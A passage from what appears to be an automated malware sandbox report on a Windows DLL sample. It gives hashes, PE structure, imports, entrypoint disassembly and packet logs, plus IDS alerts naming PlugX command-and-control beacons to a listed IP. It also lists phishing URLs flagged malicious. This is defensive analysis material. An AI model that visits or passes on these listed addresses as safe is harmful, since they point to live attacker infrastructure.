                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                            • 13.107.42.20
                            Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.emlGet hashmaliciousUnknownBrowse
                            • 204.79.197.203

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            28a2c9bd18a11de089ef85a160da29e4http://ahp410.acemlnb.comGet hashmaliciousHTMLPhisherBrowse
                            • 52.165.165.26
                            https://budget.us.avgcustomerservice.com/loginGet hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            LisectAVT_2403002B_179.exeGet hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            https://maillafayette-my.sharepoint.com/:o:/g/personal/cconnell_themailgroup_com/EiPEfQb_CGBDlFd0abPX6YIB1n8KvJoQzv3I2xEqExsGKQ?e=6alXaGGet hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            https://apples-24x-7-support-care-b2-cdn.info/Get hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            https://forms.office.com/Pages/ResponsePage.aspx?id=2zW8lMsRrkyqi7IHHVNhLgILSZ8nyRhPs0os36GqVFNURElXNEQwRldKWjdYM0cwRERLSFFETE9ERy4uGet hashmaliciousHTMLPhisherBrowse
                            • 52.165.165.26
                            http://agencygrin.comGet hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            http://bbp.summitwith.usGet hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            https://cs-991.mint-imaging.com/Citrix/StoreWeb/Get hashmaliciousUnknownBrowse
                            • 52.165.165.26
                            3b5074b1b5d032e5620f69f9f700ff0eLisectAVT_2403002B_132.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_143.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_143.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_161.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_161.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            LisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            http://agencygrin.comGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253
                            http://drive.usercontent.google.comGet hashmaliciousUnknownBrowse
                            • 40.113.110.67
                            • 40.115.3.253

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.588882386142034
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:LisectAVT_2403002B_14.dll
                            File size:190'976 bytes
                            MD5:2769761a23f793d93bbad3ded28e8ebd
                            SHA1:df83ef58856650a7564b0f5d0914dc8478511ccf
                            SHA256:0f0a7d189ef514f97279ef24194c08ea5c99dd39a9d7af486ea8aedb68e0f18b
                            SHA512:9af46e2c44a63dc4a07cc7d75fb24d82174801e87b0cf95f3ca8b86613ba20de93c0cc246d20a7487f05ce5825c1a6824e8ef31dc2a3b196b079527186fde047
                            SSDEEP:3072:M2U6Z3AUyPihSJjBIYj5MxPYlGUySgWmVNlFJa34kg:M2JVwihSJjOYWPkOXXB
                            TLSH:9E144A14E5018339F8BF00FAC7BD273D696C9A72879926C323C55C5A66867E3BE35183
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X..............A...............y.......I.......H.......O.....Rich............PE..L......N...........!.....d...6.............

                            File Icon

                            Icon Hash:7ae282899bbab082

                            Static PE Info

                            General

                            Entrypoint:0x737d1880
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x737d0000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x4EE21DCE [Fri Dec 9 14:40:14 2011 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:a87240b873c1a5b2b17c559a4ce533e7

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            push ecx
                            mov eax, dword ptr [73800628h]
                            and eax, 01h
                            jne 00007F97047E9BADh
                            mov ecx, dword ptr [73800628h]
                            or ecx, 01h
                            mov dword ptr [73800628h], ecx
                            mov edx, dword ptr [737F8194h]
                            mov dword ptr [73800624h], edx
                            mov eax, dword ptr [ebp+0Ch]
                            mov dword ptr [ebp-04h], eax
                            cmp dword ptr [ebp-04h], 00000000h
                            je 00007F97047E9BA1h
                            cmp dword ptr [ebp-04h], 01h
                            je 00007F97047E9B94h
                            jmp 00007F97047E9B9Eh
                            call 00007F97047E9363h
                            jmp 00007F97047E9B97h
                            call 00007F97047E938Ch
                            mov eax, 00000001h
                            mov esp, ebp
                            pop ebp
                            retn 000Ch
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            sub esp, 08h
                            mov eax, dword ptr [737F8120h]
                            mov dword ptr [ebp-04h], eax
                            mov dword ptr [ebp-08h], 00000000h
                            call 00007F97047E932Bh
                            call 00007F97047FF966h
                            mov dword ptr [ebp-08h], eax
                            mov ecx, dword ptr [ebp-08h]
                            push ecx
                            call 00007F97047EA43Ah
                            push eax
                            call 00007F97047EA4F4h
                            test eax, eax
                            jne 00007F97047E9B9Bh
                            mov edx, dword ptr [ebp-08h]
                            push edx
                            call 00007F97047EA607h
                            call 00007F97047E9332h
                            mov eax, dword ptr [ebp-08h]
                            mov esp, ebp
                            pop ebp
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            pop ebp
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            pop ebp
                            ret
                            int3
                            int3

                            Rich Headers

                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2010 build 30319
                            • [EXP] VS2010 build 30319
                            • [RES] VS2010 build 30319
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x2bfc00x3d4.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2b5900x64.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x3e0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9b0000x2188.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x280000x1b4.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x262de0x26400a12ac472b50da1763b63988f2d9724c4False0.4705371732026144data6.374301962893391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x280000x43940x440082b918d77a044f40686ae5809c89ddbdFalse0.759765625data7.055205472510572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x2d0000x6c5510xa00c81870d3c545b9989522cccbbdbde726False0.913671875data7.449705734565964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x9a0000x3e00x4006117fb448b882a3030c2aff8efcd289bFalse0.4248046875data3.0643979755835313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x9b0000x26fc0x2800745f439c351f3878b92a5df493588d95False0.62431640625data6.137144019251764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_DIALOG0x9a3400x9cdataChineseChina0.6794871794871795
                            RT_VERSION0x9a0a00x29cdataChineseChina0.4550898203592814

                            Imports

                            DLLImport
                            KERNEL32.dllEnumTimeFormatsW, GlobalAddAtomW, TryEnterCriticalSection, HeapAlloc, EnumResourceNamesW, GlobalFix, HeapCompact, TlsSetValue, FindResourceExA, MoveFileA, CompareFileTime, WriteProfileSectionW, InitializeSListHead, UpdateResourceA, ClearCommBreak, GetDevicePowerState, Sleep, EnumResourceTypesW, SetConsoleTitleA, IsSystemResumeAutomatic, GetShortPathNameA, GetPrivateProfileStringW, IsBadStringPtrA, CreateMailslotW, LoadLibraryA, GetProcAddress, PeekConsoleInputA, GetSystemWindowsDirectoryW, OpenWaitableTimerA, CreateFileW, GetLastError, SetFilePointer, WriteFile, CloseHandle, SetConsoleActiveScreenBuffer, SetCurrentDirectoryW, EnumSystemCodePagesA, GetCalendarInfoA, GetTickCount, FindResourceW
                            USER32.dllDefDlgProcA, DrawAnimatedRects, ArrangeIconicWindows, SetWindowRgn, HideCaret, ScrollWindowEx, ShowWindowAsync, RegisterClipboardFormatA, AnimateWindow, FillRect, GetClassInfoExW, IsDialogMessageW, CharLowerBuffA, LoadStringW, GetKBCodePage, DlgDirSelectComboBoxExA, ClipCursor, IsWindowUnicode, SendMessageTimeoutA, PostMessageA, OemToCharA, GetClipboardFormatNameA, UnregisterDeviceNotification, ExitWindowsEx, SetPropA, SystemParametersInfoA, UnregisterClassA, GetDlgItemInt, IsWindowEnabled, LoadCursorFromFileA
                            GDI32.dllCloseFigure, SetBitmapBits, GetPixel, PlayMetaFileRecord, GetMiterLimit, GetEnhMetaFileHeader, SetICMProfileA, SetColorSpace, SetICMMode, SetTextColor, SetDeviceGammaRamp, SelectPalette, GetWindowExtEx, CreateEnhMetaFileA, DeleteDC, LPtoDP, GetBitmapBits
                            ADVAPI32.dllIsValidSid, SetSecurityDescriptorSacl, RegDisablePredefinedCache, FileEncryptionStatusW, LookupPrivilegeNameW, OpenBackupEventLogW, LogonUserW, RegEnumKeyW, StartServiceCtrlDispatcherW, InitiateSystemShutdownExW, SetKernelObjectSecurity, AreAllAccessesGranted, QueryServiceConfigA, LookupPrivilegeNameA, RegOpenUserClassesRoot, ImpersonateLoggedOnUser, ReadEventLogW, RegEnumKeyExA

                            Exports

                            NameOrdinalAddress
                            GnrkBltvkx10x737d1a90
                            GnrkBmoaar20x737d1aa0
                            GnrkCyrpw30x737d1a40
                            GnrkEkp40x737d1be0
                            GnrkEnjzs50x737d1d80
                            GnrkFa60x737d1d60
                            GnrkFsx70x737d1940
                            GnrkGm80x737d1c70
                            GnrkGt90x737d1b30
                            GnrkHhcpo100x737d1c20
                            GnrkHjtl110x737d1c10
                            GnrkIiip120x737d1d90
                            GnrkJird130x737d1d50
                            GnrkJstv140x737d1e20
                            GnrkKhlhca150x737d1e10
                            GnrkKhqbbu160x737d1f00
                            GnrkLmkamk170x737d1dc0
                            GnrkLoc180x737d1a10
                            GnrkNlqh190x737d1e00
                            GnrkNofovl200x737d1da0
                            GnrkNr210x737d1970
                            GnrkNsdwzc220x737d1a70
                            GnrkOda230x737d1ca0
                            GnrkOhqbhe240x737d1ee0
                            GnrkOi250x737d1db0
                            GnrkOksgc260x737d1cb0
                            GnrkOxft270x737d1960
                            GnrkPp280x737d1b00
                            GnrkQm290x737d1bf0
                            GnrkQr300x737d1770
                            GnrkQulon310x737d1c90
                            GnrkRrdcfn320x737d1c50
                            GnrkSbq330x737d1990
                            GnrkSf340x737d1ec0
                            GnrkStso350x737d1ae0
                            GnrkTcfv360x737d1eb0
                            GnrkTch370x737d1c30
                            GnrkTjxdo380x737d1ab0
                            GnrkTrg390x737d1e60
                            GnrkUsmc400x737d1930
                            GnrkVnndq410x737d1b10
                            GnrkWapq420x737d1de0
                            GnrkWsnq430x737d1ad0
                            GnrkWtlrh440x737d1c00
                            GnrkWyey450x737d1c40
                            GnrkXalbb460x737d1950
                            GnrkXzwnp470x737d1a50
                            GnrkZewk480x737d1d20
                            GnrkZtdij490x737d1b70

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            ChineseChina

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                            2024-07-25T17:57:11.023216+0200TCP2036858ET MALWARE PlugX CnC Beacon4973380192.168.2.652.90.110.169
                            2024-07-25T17:55:50.513790+0200TCP2036858ET MALWARE PlugX CnC Beacon4972380192.168.2.652.90.110.169
                            2024-07-25T17:56:37.112001+0200TCP2036858ET MALWARE PlugX CnC Beacon497298080192.168.2.652.90.110.169
                            2024-07-25T17:55:09.573145+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972052.165.165.26192.168.2.6
                            2024-07-25T17:55:33.455482+0200TCP2036858ET MALWARE PlugX CnC Beacon4972180192.168.2.652.90.110.169
                            2024-07-25T17:57:16.369027+0200TCP2036858ET MALWARE PlugX CnC Beacon4973480192.168.2.652.90.110.169
                            2024-07-25T17:56:23.050140+0200TCP2036858ET MALWARE PlugX CnC Beacon497268080192.168.2.652.90.110.169
                            2024-07-25T17:55:11.045496+0200TCP2036858ET MALWARE PlugX CnC Beacon4971880192.168.2.652.90.110.169
                            2024-07-25T17:54:31.588390+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971352.165.165.26192.168.2.6
                            2024-07-25T17:57:05.987539+0200TCP2036858ET MALWARE PlugX CnC Beacon4973280192.168.2.652.90.110.169
                            2024-07-25T17:56:32.080676+0200TCP2036858ET MALWARE PlugX CnC Beacon497288080192.168.2.652.90.110.169

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 25, 2024 17:54:10.689420938 CEST49674443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:10.689469099 CEST49673443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:11.017412901 CEST49672443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:17.826790094 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:17.826845884 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:17.826919079 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:17.827599049 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:17.827613115 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.752722979 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.752827883 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.758467913 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.758491993 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.758790970 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.760627031 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.760688066 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.760699034 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.760873079 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.808512926 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.942621946 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.943001986 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.943121910 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.943309069 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:18.943332911 CEST4434971040.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:18.943351030 CEST49710443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:20.298732996 CEST49674443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:20.298733950 CEST49673443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:20.626837015 CEST49672443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:22.400389910 CEST44349705173.222.162.64192.168.2.6
                            Jul 25, 2024 17:54:22.400582075 CEST49705443192.168.2.6173.222.162.64
                            Jul 25, 2024 17:54:26.147855997 CEST4971180192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:26.153084993 CEST804971152.90.110.169192.168.2.6
                            Jul 25, 2024 17:54:26.153155088 CEST4971180192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:26.153551102 CEST4971180192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:26.163907051 CEST804971152.90.110.169192.168.2.6
                            Jul 25, 2024 17:54:26.166481018 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:26.166532993 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:26.166754007 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:26.167644024 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:26.167656898 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.028791904 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.029649019 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.030607939 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.030620098 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.030847073 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.032768965 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.032922983 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.032922983 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.032927990 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.076498032 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.212403059 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.212488890 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.212953091 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.212953091 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:27.212982893 CEST4434971240.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:27.213006020 CEST49712443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:30.532378912 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:30.532429934 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:30.532510996 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:30.533443928 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:30.533454895 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.313271046 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.313343048 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.316278934 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.316289902 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.316526890 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.340521097 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.384506941 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.582511902 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.582567930 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.582609892 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.582704067 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.582732916 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.582874060 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.587287903 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.587384939 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.587393045 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.588156939 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.588175058 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.588197947 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.588212013 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.588217974 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:31.588227987 CEST49713443192.168.2.652.165.165.26
                            Jul 25, 2024 17:54:31.588231087 CEST4434971352.165.165.26192.168.2.6
                            Jul 25, 2024 17:54:38.978712082 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:38.978799105 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:38.978890896 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:38.979571104 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:38.979598999 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:40.482805967 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:40.483047009 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:40.488200903 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:40.488229036 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:40.489084005 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:40.490931988 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:40.491008043 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:40.491019011 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:40.491117954 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:40.532555103 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:41.144376993 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:41.144543886 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:41.144911051 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:41.144947052 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:41.144965887 CEST49717443192.168.2.640.113.110.67
                            Jul 25, 2024 17:54:41.144972086 CEST4434971740.113.110.67192.168.2.6
                            Jul 25, 2024 17:54:47.540843010 CEST804971152.90.110.169192.168.2.6
                            Jul 25, 2024 17:54:47.541023970 CEST4971180192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:47.541112900 CEST4971180192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:47.545984030 CEST804971152.90.110.169192.168.2.6
                            Jul 25, 2024 17:54:49.657166004 CEST4971880192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:49.662364960 CEST804971852.90.110.169192.168.2.6
                            Jul 25, 2024 17:54:49.662476063 CEST4971880192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:49.663119078 CEST4971880192.168.2.652.90.110.169
                            Jul 25, 2024 17:54:49.668275118 CEST804971852.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:01.619185925 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:01.619240999 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:01.619326115 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:01.620003939 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:01.620021105 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.536003113 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.536245108 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.538173914 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.538192034 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.538497925 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.540375948 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.540465117 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.540472984 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.540621996 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.584502935 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.715455055 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.715533018 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:03.715668917 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.715843916 CEST49719443192.168.2.640.113.110.67
                            Jul 25, 2024 17:55:03.715857983 CEST4434971940.113.110.67192.168.2.6
                            Jul 25, 2024 17:55:07.749150038 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:07.749183893 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:07.749275923 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:07.749644995 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:07.749658108 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.299978018 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.300040007 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.302829981 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.302843094 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.303076029 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.306896925 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.348546982 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.568620920 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.568660021 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.568676949 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.568955898 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.568980932 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.569041014 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.572948933 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.572990894 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.573036909 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.573069096 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.573122025 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.573201895 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.573219061 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:09.573230028 CEST49720443192.168.2.652.165.165.26
                            Jul 25, 2024 17:55:09.573235035 CEST4434972052.165.165.26192.168.2.6
                            Jul 25, 2024 17:55:11.045417070 CEST804971852.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:11.045495987 CEST4971880192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:11.046040058 CEST4971880192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:11.053024054 CEST804971852.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:12.059077024 CEST4972180192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:12.064285994 CEST804972152.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:12.065888882 CEST4972180192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:12.066039085 CEST4972180192.168.2.652.90.110.169
                            Jul 25, 2024 17:55:12.073990107 CEST804972152.90.110.169192.168.2.6
                            Jul 25, 2024 17:55:25.458007097 CEST49722443192.168.2.640.113.110.67
